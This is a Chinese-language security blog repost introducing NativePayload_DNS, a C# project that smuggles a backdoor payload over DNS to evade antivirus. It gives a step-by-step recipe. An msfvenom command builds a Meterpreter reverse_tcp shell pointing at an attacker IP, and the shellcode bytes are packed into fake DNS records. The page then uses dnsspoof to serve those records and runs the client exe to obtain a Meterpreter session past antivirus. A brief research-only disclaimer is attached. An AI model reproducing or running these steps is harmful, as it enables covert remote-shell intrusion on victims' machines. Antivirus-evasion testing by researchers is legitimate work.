记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

NativePayload_DNS:通过DNS传输的后门Payload和绕过反病毒的项目

2017-03-09 11:40

AAEAAQAAAAAAAAfdAAAAJDBjZDIxYjFiLTMyNDctNDRmZS04YWQwLWI5YjY0NWM2YTM2Yg

项目主页

https://github.com/DamonMohammadbagher/NativePayload_DNS

简介

NativePayload_DNS是一款用于通过DNS传输的后门有效负载传输和绕过反病毒的C#代码项目,适用于安全研究人员测试杀毒软件的漏洞,请勿用于非法用途!

参考资料:

视频演示:

视频由Damon Mohammadbagher发布

后门利用DNS传送信息绕过杀毒软件视频1:

https://youtu.be/M4dbqRWRsUk

使用NativePayload_DNS和Meterpreter_Payload_Detection绕过AV视频2:

https://youtu.be/ngZl4PSfW6o

视频说明:使用NativePayload_DNS.exe绕过AV并使用Meterpreter_Payload_Detection工具检测Meterpreter进程

使用

步骤一

在kali linux上创建msfvenom payload

msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 
–f c > /root/Desktop/payload.txt

将payload从payload.txt文件复制到dns.txt,格式如下:

root@kali:~# cat /root/Desktop/dns.txt

1.1.1.0 "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"

1.1.1.1 "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"

1.1.1.2 "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"

1.1.1.3 "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"

步骤二

在kali linux中伪造DNS服务器

root@kali:~# dnsspoof -i eth0 -f /root/Desktop/dns.txt

步骤三

在客户端运行代码:

syntax: NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"

然后你就可以绕过AVs并且获得Meterpreter Session

相关工具

相关链接

 

*转载请注明来自MottoIN


知识来源: www.mottoin.com/98026.html

阅读:302698 | 评论:0 | 标签:工具 DNS传输 Payload 后门 绕过反病毒

想收藏或者和大家分享这篇好文章→复制链接地址

“NativePayload_DNS:通过DNS传输的后门Payload和绕过反病毒的项目”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云